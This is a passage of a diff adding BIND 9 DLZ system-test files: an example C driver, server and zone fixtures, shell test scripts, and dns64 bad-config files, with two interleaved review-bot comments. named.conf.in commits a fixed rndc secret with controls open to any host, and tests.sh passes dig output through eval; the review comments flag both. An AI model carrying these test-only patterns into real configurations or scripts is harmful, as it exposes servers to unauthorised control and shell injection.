(as set in + * the 'newversion' dlz function) we can pick it up from the + * clientinfo. + * + * This allows a lookup to query the correct version of the DNS + * data, if the DLZ can differentiate between versions. + * + * For example, if a new database transaction is created by + * 'newversion', the lookup should query within the same + * transaction scope if it can. + * + * If the DLZ only operates on 'live' data, then version + * wouldn't necessarily be needed. 
+ */ + if (clientinfo != NULL && clientinfo->version >= 2) { + dbversion = clientinfo->dbversion; + if (dbversion != NULL && *(bool *)dbversion) { + loginfo("dlz_example: lookup against live transaction"); + } + } + + if (strcmp(name, "source-addr") == 0) { + char ecsbuf[DNS_ECS_FORMATSIZE] = "not supported"; + strncpy(buf, "unknown", sizeof(buf)); + if (methods != NULL && methods->sourceip != NULL && + (methods->version - methods->age <= + DNS_CLIENTINFOMETHODS_VERSION) && + DNS_CLIENTINFOMETHODS_VERSION <= methods->version) + { + methods->sourceip(clientinfo, &src); + fmt_address(src, buf, sizeof(buf)); + } + if (clientinfo != NULL && clientinfo->version >= 3) { + if (clientinfo->ecs.addr.family != AF_UNSPEC) { + dns_ecs_format(&clientinfo->ecs, ecsbuf, + sizeof(ecsbuf)); + } else { + snprintf(ecsbuf, sizeof(ecsbuf), "%s", + "not present"); + } + } + i = strlen(buf); + snprintf(buf + i, sizeof(buf) - i - 1, " ECS %s", ecsbuf); + + loginfo("dlz_example: lookup connection from %s", buf); + + found = true; + result = state->putrr(lookup, "TXT", 0, buf); + if (result != ISC_R_SUCCESS) { + return (result); + } + } + + if (strcmp(name, "too-long") == 0 || + strcmp(zone, "bigcname.domain") == 0) + { + for (i = 0; i < 511; i++) { + buf[i] = 'x'; + } + buf[i] = '\0'; + found = true; + result = state->putrr(lookup, "TXT", 0, buf); + if (result != ISC_R_SUCCESS) { + return (result); + } + } + + /* Tests for DLZ redirection zones */ + if (strcmp(name, "*") == 0 && strcmp(zone, ".") == 0) { + result = state->putrr(lookup, "A", 0, "100.100.100.2"); + found = true; + if (result != ISC_R_SUCCESS) { + return (result); + } + } + + if (strcmp(name, "long.name.is.not.there") == 0 && + strcmp(zone, ".") == 0) + { + result = state->putrr(lookup, "A", 0, "100.100.100.3"); + found = true; + if (result != ISC_R_SUCCESS) { + return (result); + } + } + + /* Answer from current records */ + for (i = 0; i < MAX_RECORDS; i++) { + if (strcasecmp(state->current[i].name, full_name) == 0) { + 
found = true; + result = state->putrr(lookup, state->current[i].type, + state->current[i].ttl, + state->current[i].data); + if (result != ISC_R_SUCCESS) { + return (result); + } + } + } + + if (!found) { + return (ISC_R_NOTFOUND); + } + + return (ISC_R_SUCCESS); +} + +/* + * See if a zone transfer is allowed + */ +isc_result_t +dlz_allowzonexfr(void *dbdata, const char *name, const char *client) { + struct dlz_example_data *state = (struct dlz_example_data *)dbdata; + isc_result_t result; + + loginfo("dlz_example: dlz_allowzonexfr called for %s", name); + + result = dlz_findzonedb(dbdata, name, NULL, NULL); + if (result != ISC_R_SUCCESS) { + loginfo("dlz_example: findzonedb returned %s", + isc_result_totext(result)); + return (result); + } + + /* + * Exception for "example.org" so we can test the use of + * the view ACL. + */ + if (strcmp(name, "example.org") == 0) { + loginfo("dlz_example: use view ACL for example.org"); + return (ISC_R_DEFAULT); + } + + /* + * Exception for 10.53.0.5 so we can test that allow-transfer + * is effective. 
+ */ + if (strcmp(client, "10.53.0.5") == 0) { + loginfo("dlz_example: disallow transfer to 10.53.0.5"); + return (ISC_R_NOPERM); + } + + loginfo("dlz_example: transfer allowed for %s", name); + + return (ISC_R_SUCCESS); +} + +/* + * Perform a zone transfer + */ +isc_result_t +dlz_allnodes(const char *zone, void *dbdata, dns_sdlzallnodes_t *allnodes) { + struct dlz_example_data *state = (struct dlz_example_data *)dbdata; + int i; + + UNUSED(zone); + + if (state->putnamedrr == NULL) { + return (ISC_R_NOTIMPLEMENTED); + } + + for (i = 0; i < MAX_RECORDS; i++) { + isc_result_t result; + if (strlen(state->current[i].name) == 0U) { + continue; + } + result = state->putnamedrr(allnodes, state->current[i].name, + state->current[i].type, + state->current[i].ttl, + state->current[i].data); + if (result != ISC_R_SUCCESS) { + return (result); + } + } + + return (ISC_R_SUCCESS); +} + +/* + * Start a transaction + */ +isc_result_t +dlz_newversion(const char *zone, void *dbdata, void **versionp) { + struct dlz_example_data *state = (struct dlz_example_data *)dbdata; + + if (state->transaction_started) { + loginfo("dlz_example: transaction already started for zone %s", + zone); + return (ISC_R_FAILURE); + } + + state->transaction_started = true; + *versionp = (void *)&state->transaction_started; + + return (ISC_R_SUCCESS); +} + +/* + * End a transaction + */ +void +dlz_closeversion(const char *zone, bool commit, void *dbdata, void **versionp) { + struct dlz_example_data *state = (struct dlz_example_data *)dbdata; + + if (!state->transaction_started) { + loginfo("dlz_example: transaction not started for zone %s", + zone); + *versionp = NULL; + return; + } + + state->transaction_started = false; + + *versionp = NULL; + + if (commit) { + int i; + loginfo("dlz_example: committing transaction on zone %s", zone); + for (i = 0; i < MAX_RECORDS; i++) { + if (strlen(state->deletes[i].name) > 0U) { + (void)del_name(state, &state->current[0], + state->deletes[i].name, + 
state->deletes[i].type, + state->deletes[i].ttl, + state->deletes[i].data); + } + } + for (i = 0; i < MAX_RECORDS; i++) { + if (strlen(state->adds[i].name) > 0U) { + (void)add_name(state, &state->current[0], + state->adds[i].name, + state->adds[i].type, + state->adds[i].ttl, + state->adds[i].data); + } + } + } else { + loginfo("dlz_example: cancelling transaction on zone %s", zone); + } + memset(state->adds, 0, sizeof(state->adds)); + memset(state->deletes, 0, sizeof(state->deletes)); +} + +/* + * Configure a writeable zone + */ +isc_result_t +dlz_configure(dns_view_t *view, dns_dlzdb_t *dlzdb, void *dbdata) { + struct dlz_example_data *state = (struct dlz_example_data *)dbdata; + isc_result_t result; + + loginfo("dlz_example: starting configure"); + + if (state->writeable_zone == NULL) { + loginfo("dlz_example: no writeable_zone method available"); + return (ISC_R_FAILURE); + } + + result = state->writeable_zone(view, dlzdb, state->zone_name); + if (result != ISC_R_SUCCESS) { + loginfo("dlz_example: failed to configure zone %s", + state->zone_name); + return (result); + } + + loginfo("dlz_example: configured writeable zone %s", state->zone_name); + return (ISC_R_SUCCESS); +} + +/* + * Authorize a zone update + */ +bool +dlz_ssumatch(const char *signer, const char *name, const char *tcpaddr, + const char *type, const char *key, uint32_t keydatalen, + unsigned char *keydata, void *dbdata) { + struct dlz_example_data *state = (struct dlz_example_data *)dbdata; + + UNUSED(tcpaddr); + UNUSED(type); + UNUSED(key); + UNUSED(keydatalen); + UNUSED(keydata); + + if (strncmp(name, "deny.", 5) == 0) { + loginfo("dlz_example: denying update of name=%s by %s", name, + signer); + return (false); + } + loginfo("dlz_example: allowing update of name=%s by %s", name, signer); + return (true); +} + +static isc_result_t +modrdataset(struct dlz_example_data *state, const char *name, + const char *rdatastr, struct record *list) { + char *full_name, *dclass, *type, *data, *ttlstr, *buf; 
+ char absolute[1024]; + isc_result_t result; + char *saveptr = NULL; + + buf = strdup(rdatastr); + if (buf == NULL) { + return (ISC_R_FAILURE); + } + + /* + * The format is: + * FULLNAME\tTTL\tDCLASS\tTYPE\tDATA + * + * The DATA field is space separated, and is in the data format + * for the type used by dig + */ + + full_name = strtok_r(buf, "\t", &saveptr); + if (full_name == NULL) { + goto error; + } + + ttlstr = strtok_r(NULL, "\t", &saveptr); + if (ttlstr == NULL) { + goto error; + } + + dclass = strtok_r(NULL, "\t", &saveptr); + if (dclass == NULL) { + goto error; + } + + type = strtok_r(NULL, "\t", &saveptr); + if (type == NULL) { + goto error; + } + + data = strtok_r(NULL, "\t", &saveptr); + if (data == NULL) { + goto error; + } + + if (name[strlen(name) - 1] != '.') { + snprintf(absolute, sizeof(absolute), "%s.", name); + name = absolute; + } + + result = add_name(state, list, name, type, strtoul(ttlstr, NULL, 10), + data); + free(buf); + return (result); + +error: + free(buf); + return (ISC_R_FAILURE); +} + +isc_result_t +dlz_addrdataset(const char *name, const char *rdatastr, void *dbdata, + void *version) { + struct dlz_example_data *state = (struct dlz_example_data *)dbdata; + + if (version != (void *)&state->transaction_started) { + return (ISC_R_FAILURE); + } + + loginfo("dlz_example: adding rdataset %s '%s'", name, rdatastr); + + return (modrdataset(state, name, rdatastr, &state->adds[0])); +} + +isc_result_t +dlz_subrdataset(const char *name, const char *rdatastr, void *dbdata, + void *version) { + struct dlz_example_data *state = (struct dlz_example_data *)dbdata; + + if (version != (void *)&state->transaction_started) { + return (ISC_R_FAILURE); + } + + loginfo("dlz_example: subtracting rdataset %s '%s'", name, rdatastr); + + return (modrdataset(state, name, rdatastr, &state->deletes[0])); +} + +isc_result_t +dlz_delrdataset(const char *name, const char *type, void *dbdata, + void *version) { + struct dlz_example_data *state = (struct 
dlz_example_data *)dbdata; + + if (version != (void *)&state->transaction_started) { + return (ISC_R_FAILURE); + } + + loginfo("dlz_example: deleting rdataset %s of type %s", name, type); + + return (ISC_R_SUCCESS); +} diff --git a/bin/tests/system/dlzexternal/driver.h b/bin/tests/system/dlzexternal/driver.h new file mode 100644 index 0000000..2c1a594 --- /dev/null +++ b/bin/tests/system/dlzexternal/driver.h @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +#pragma once + +#include <dns/dlz_dlopen.h> + +/* + * This header includes the declarations of entry points. + */ + +dlz_dlopen_version_t dlz_version; +dlz_dlopen_create_t dlz_create; +dlz_dlopen_destroy_t dlz_destroy; +dlz_dlopen_findzonedb_t dlz_findzonedb; +dlz_dlopen_lookup_t dlz_lookup; +dlz_dlopen_allowzonexfr_t dlz_allowzonexfr; +dlz_dlopen_allnodes_t dlz_allnodes; +dlz_dlopen_newversion_t dlz_newversion; +dlz_dlopen_closeversion_t dlz_closeversion; +dlz_dlopen_configure_t dlz_configure; +dlz_dlopen_ssumatch_t dlz_ssumatch; +dlz_dlopen_addrdataset_t dlz_addrdataset; +dlz_dlopen_subrdataset_t dlz_subrdataset; +dlz_dlopen_delrdataset_t dlz_delrdataset; diff --git a/bin/tests/system/dlzexternal/ns1/dlzs.conf.in b/bin/tests/system/dlzexternal/ns1/dlzs.conf.in new file mode 100644 index 0000000..9166cd6 --- /dev/null +++ b/bin/tests/system/dlzexternal/ns1/dlzs.conf.in 
@@ -0,0 +1,44 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, You can obtain one at http://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dlz "example one" {
+ database "dlopen ../driver.@SO@ example.nil";
+};
+
+dlz "example two" {
+ database "dlopen ../driver.@SO@ alternate.nil";
+};
+
+dlz "example three" {
+ database "dlopen ../driver.@SO@ example.org";
+};
+
+dlz "example four" {
+ // Long zone name to trigger ISC_R_NOSPACE in dns_sdlz_putrr.
+ database "dlopen ../driver.@SO@ 123456789.123456789.123456789.123456789.123456789.example.foo";
+};
+
+dlz "unsearched1" {
+ database "dlopen ../driver.@SO@ other.nil";
+ search no;
+};
+
+dlz "unsearched2" {
+ database "dlopen ../driver.@SO@ zone.nil";
+ search no;
+};
+
+dlz redzone {
+ database "dlopen ../driver.@SO@ .";
+ search no;
+};
diff --git a/bin/tests/system/dlzexternal/ns1/named.conf.in b/bin/tests/system/dlzexternal/ns1/named.conf.in
new file mode 100644
index 0000000..b30ae8e
--- /dev/null
+++ b/bin/tests/system/dlzexternal/ns1/named.conf.in
@@ -0,0 +1,54 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ session-keyfile "session.key";
+ listen-on { 10.53.0.1; 127.0.0.1; };
+ listen-on-v6 { none; };
+ allow-transfer { !10.53.0.1; any; };
+ recursion no;
+ notify yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+include "ddns.key";
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+include "dlzs.conf";
+
+zone zone.nil {
+ type primary;
+ dlz unsearched2;
+};
+
+zone "." {
+ type redirect;
+ dlz redzone;
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
diff --git a/bin/tests/system/dlzexternal/ns1/root.db b/bin/tests/system/dlzexternal/ns1/root.db
new file mode 100644
index 0000000..6cbe579
--- /dev/null
+++ b/bin/tests/system/dlzexternal/ns1/root.db
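Review bot: The `controls` block takes rndc connections from `allow { any; }` and authenticates them with `rndc_key`, whose secret `"1234abcd8765"` is committed in plain text a few lines above, and nothing in the file says this is acceptable only because it is a system-test fixture bound to 10.53.0.1. A comment above the `key` statement such as `// Test fixture only: fixed, public rndc secret; do not reuse this key/controls pair outside the system-test network.` would keep the pair from being copied into a real configuration. The `allow-transfer { !10.53.0.1; any; };` line also deserves a one-line comment; judging from tests.sh in the same commit, the 10.53.0.1 exclusion appears to exist so the "AXFR denied based on view ACL" step can exercise the view ACL for example.org.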
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA gson.nominum.com. a.root.servers.nil. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+
+example. NS ns1.example.
+ns1.example. A 10.53.0.1
+
+exists. A 10.10.10.10
diff --git a/bin/tests/system/dlzexternal/prereq.sh b/bin/tests/system/dlzexternal/prereq.sh
new file mode 100644
index 0000000..9c161c2
--- /dev/null
+++ b/bin/tests/system/dlzexternal/prereq.sh
@@ -0,0 +1,27 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$FEATURETEST --have-dlopen || {
+ echo_i "dlopen() not supported - skipping dlzexternal test"
+ exit 255
+}
+
+$FEATURETEST --tsan && {
+ echo_i "TSAN - skipping dlzexternal test"
+ exit 255
+}
+
+exit 0
diff --git a/bin/tests/system/dlzexternal/setup.sh b/bin/tests/system/dlzexternal/setup.sh
new file mode 100644
index 0000000..6d6b4d4
--- /dev/null
+++ b/bin/tests/system/dlzexternal/setup.sh
@@ -0,0 +1,19 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$DDNSCONFGEN -q -z example.nil > ns1/ddns.key
+
+copy_setports ns1/named.conf.in ns1/named.conf
diff --git a/bin/tests/system/dlzexternal/tests.sh b/bin/tests/system/dlzexternal/tests.sh
new file mode 100644
index 0000000..ab35051
--- /dev/null
+++ b/bin/tests/system/dlzexternal/tests.sh
@@ -0,0 +1,230 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +DIGOPTS="@10.53.0.1 -p ${PORT} +nocookie" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +newtest() { + n=`expr $n + 1` + echo_i "${1} (${n})" + ret=0 +} + +test_update() { + host="$1" + type="$2" + cmd="$3" + digout="$4" + should_fail="$5" + + cat <<EOF > ns1/update.txt +server 10.53.0.1 ${PORT} +update add $host $cmd +send +EOF + + newtest "testing update for $host $type $cmd${comment:+ }$comment" + $NSUPDATE -k ns1/ddns.key ns1/update.txt > /dev/null 2>&1 || { + [ "$should_fail" ] || \ + echo_i "update failed for $host $type $cmd" + return 1 + } + + out=`$DIG $DIGOPTS -t $type -q $host | grep -E "^$host"` + lines=`echo "$out" | grep "$digout" | wc -l` + [ $lines -eq 1 ] || { + [ "$should_fail" ] || \ + echo_i "dig output incorrect for $host $type $cmd: $out" + return 1 + } + return 0 +} + +test_update testdc1.example.nil. A "86400 A 10.53.0.10" "10.53.0.10" || ret=1 +status=`expr $status + $ret` + +test_update testdc2.example.nil. A "86400 A 10.53.0.11" "10.53.0.11" || ret=1 +status=`expr $status + $ret` + +test_update testdc3.example.nil. A "86400 A 10.53.0.10" "10.53.0.10" || ret=1 +status=`expr $status + $ret` + +test_update deny.example.nil. 
TXT "86400 TXT helloworld" "helloworld" should_fail && ret=1 +status=`expr $status + $ret` + +newtest "testing nxrrset" +$DIG $DIGOPTS testdc1.example.nil AAAA > dig.out.$n +grep "status: NOERROR" dig.out.$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.$n > /dev/null || ret=1 +status=`expr $status + $ret` + +newtest "testing prerequisites are checked correctly" +cat > ns1/update.txt << EOF +server 10.53.0.1 ${PORT} +prereq nxdomain testdc3.example.nil +update add testdc3.example.nil 86500 in a 10.53.0.12 +send +EOF +$NSUPDATE -k ns1/ddns.key ns1/update.txt > /dev/null 2>&1 && ret=1 +out=`$DIG $DIGOPTS +short a testdc3.example.nil` +[ "$out" = "10.53.0.12" ] && ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing passing client info into DLZ driver" +out=`$DIG $DIGOPTS +short -t txt -q source-addr.example.nil | grep -v '^;'` +addr=`eval echo "$out" | cut -f1 -d'#'` +[ "$addr" = "10.53.0.1" ] || ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing DLZ driver is cleaned up on reload" +rndc_reload ns1 10.53.0.1 +for i in 0 1 2 3 4 5 6 7 8 9; do + ret=0 + grep 'dlz_example: shutting down zone example.nil' ns1/named.run > /dev/null 2>&1 || ret=1 + [ "$ret" -eq 0 ] && break + sleep 1 +done +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing multiple DLZ drivers" +test_update testdc1.alternate.nil. 
A "86400 A 10.53.0.10" "10.53.0.10" || ret=1 +status=`expr $status + $ret` + +newtest "testing AXFR from DLZ drivers" +$DIG $DIGOPTS +noall +answer axfr example.nil > dig.out.example.ns1.test$n +lines=`cat dig.out.example.ns1.test$n | wc -l` +[ ${lines:-0} -eq 4 ] || ret=1 +$DIG $DIGOPTS +noall +answer axfr alternate.nil > dig.out.alternate.ns1.test$n +lines=`cat dig.out.alternate.ns1.test$n | wc -l` +[ ${lines:-0} -eq 5 ] || ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing AXFR denied from DLZ drivers" +$DIG $DIGOPTS -b 10.53.0.5 +noall +answer axfr example.nil > dig.out.example.ns1.test$n +grep "; Transfer failed" dig.out.example.ns1.test$n > /dev/null || ret=1 +$DIG $DIGOPTS -b 10.53.0.5 +noall +answer axfr alternate.nil > dig.out.alternate.ns1.test$n +grep "; Transfer failed" dig.out.alternate.ns1.test$n > /dev/null || ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing AXFR denied based on view ACL" +# 10.53.0.1 should be disallowed +$DIG $DIGOPTS -b 10.53.0.1 +noall +answer axfr example.org > dig.out.example.ns1.test$n.1 +grep "; Transfer failed" dig.out.example.ns1.test$n.1 > /dev/null || ret=1 +# 10.53.0.2 should be allowed +$DIG $DIGOPTS -b 10.53.0.2 +noall +answer axfr example.org > dig.out.example.ns1.test$n.2 +grep "; Transfer failed" dig.out.example.ns1.test$n.2 > /dev/null && ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing unsearched/unregistered DLZ zone is not found" +$DIG $DIGOPTS +noall +answer ns other.nil > dig.out.ns1.test$n +grep "3600.IN.NS.other.nil." dig.out.ns1.test$n > /dev/null && ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing unsearched/registered DLZ zone is found" +$DIG $DIGOPTS +noall +answer ns zone.nil > dig.out.ns1.test$n +grep "3600.IN.NS.zone.nil." 
dig.out.ns1.test$n > /dev/null || ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing unsearched/registered DLZ zone is found" +$DIG $DIGOPTS +noall +answer ns zone.nil > dig.out.ns1.test$n +grep "3600.IN.NS.zone.nil." dig.out.ns1.test$n > /dev/null || ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing correct behavior with findzone returning ISC_R_NOMORE" +$DIG $DIGOPTS +noall a test.example.com > /dev/null 2>&1 || ret=1 +# we should only find one logged lookup per searched DLZ database +lines=`grep "dlz_findzonedb.*test\.example\.com.*example.nil" ns1/named.run | wc -l` +[ $lines -eq 1 ] || ret=1 +lines=`grep "dlz_findzonedb.*test\.example\.com.*alternate.nil" ns1/named.run | wc -l` +[ $lines -eq 1 ] || ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing findzone can return different results per client" +$DIG $DIGOPTS -b 10.53.0.1 +noall a test.example.net > /dev/null 2>&1 || ret=1 +# we should only find one logged lookup per searched DLZ database +lines=`grep "dlz_findzonedb.*example\.net.*example.nil" ns1/named.run | wc -l` +[ $lines -eq 1 ] || ret=1 +lines=`grep "dlz_findzonedb.*example\.net.*alternate.nil" ns1/named.run | wc -l` +[ $lines -eq 1 ] || ret=1 +$DIG $DIGOPTS -b 10.53.0.2 +noall a test.example.net > /dev/null 2>&1 || ret=1 +# we should find several logged lookups this time +lines=`grep "dlz_findzonedb.*example\.net.*example.nil" ns1/named.run | wc -l` +[ $lines -gt 2 ] || ret=1 +lines=`grep "dlz_findzonedb.*example\.net.*alternate.nil" ns1/named.run | wc -l` +[ $lines -gt 2 ] || ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing zone returning oversized data" +$DIG $DIGOPTS txt too-long.example.nil > dig.out.ns1.test$n 2>&1 || ret=1 +grep "status: SERVFAIL" dig.out.ns1.test$n > /dev/null || ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing 
zone returning oversized data at zone origin" +$DIG $DIGOPTS txt bigcname.domain > dig.out.ns1.test$n 2>&1 || ret=1 +grep "status: SERVFAIL" dig.out.ns1.test$n > /dev/null || ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "checking redirected lookup for nonexistent name" +$DIG $DIGOPTS @10.53.0.1 unexists a > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "^unexists.*A.*100.100.100.2" dig.out.ns1.test$n > /dev/null || ret=1 +grep "flags:[^;]* aa[ ;]" dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "checking no redirected lookup for nonexistent type" +$DIG $DIGOPTS @10.53.0.1 exists aaaa > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "checking redirected lookup for a long nonexistent name" +$DIG $DIGOPTS @10.53.0.1 long.name.is.not.there a > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "^long.name.*A.*100.100.100.3" dig.out.ns1.test$n > /dev/null || ret=1 +grep "flags:[^;]* aa[ ;]" dig.out.ns1.test$n > /dev/null || ret=1 +lookups=`grep "lookup #.*\.not\.there" ns1/named.run | wc -l` +[ "$lookups" -eq 1 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "checking ECS data is passed to driver in clientinfo" +$DIG $DIGOPTS +short +subnet=192.0/16 source-addr.example.nil txt > dig.out.ns1.test$n.1 || ret=1 +grep "192.0.0.0/16/0" dig.out.ns1.test$n.1 > /dev/null || ret=1 +$DIG $DIGOPTS +short source-addr.example.nil txt > dig.out.ns1.test$n.2 || ret=1 +grep "not.*present" dig.out.ns1.test$n.2 > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ 
$status -eq 0 ] || exit 1
diff --git a/bin/tests/system/dns64/clean.sh b/bin/tests/system/dns64/clean.sh
new file mode 100644
index 0000000..b773e2d
--- /dev/null
+++ b/bin/tests/system/dns64/clean.sh
@@ -0,0 +1,22 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f ns*/named.conf
+rm -f ns1/K*
+rm -f ns1/signed.db*
+rm -f ns1/dsset-signed.
+rm -f */named.memstats
+rm -f */named.run
+rm -f dig.out.*
+rm -f ns*/named.lock
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/dns64/conf/bad1.conf b/bin/tests/system/dns64/conf/bad1.conf
new file mode 100644
index 0000000..a4b7e7f
--- /dev/null
+++ b/bin/tests/system/dns64/conf/bad1.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dns64 ::/0 { };
+};
diff --git a/bin/tests/system/dns64/conf/bad10.conf b/bin/tests/system/dns64/conf/bad10.conf
new file mode 100644
index 0000000..21855f6
--- /dev/null
+++ b/bin/tests/system/dns64/conf/bad10.conf
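Review bot: In the "testing passing client info into DLZ driver" step, ``addr=`eval echo "$out" | cut -f1 -d'#'` `` passes the TXT answer printed by dig through `eval` only to strip the surrounding quotes, so the server's answer is re-parsed as shell code. The answer comes from the test's own driver here, but the quotes can be removed without evaluating anything: ``addr=`echo "$out" | tr -d '"' | cut -f1 -d'#'` ``. Separately, the block "testing unsearched/registered DLZ zone is found" appears twice with identical commands, which looks like a paste duplicate; one copy can go.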
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dns64 0000:0000:0000:0000:0100:000f::/96 { }; /* bits [64..71] MBZ */
+};
diff --git a/bin/tests/system/dns64/conf/bad11.conf b/bin/tests/system/dns64/conf/bad11.conf
new file mode 100644
index 0000000..c3bdd92
--- /dev/null
+++ b/bin/tests/system/dns64/conf/bad11.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
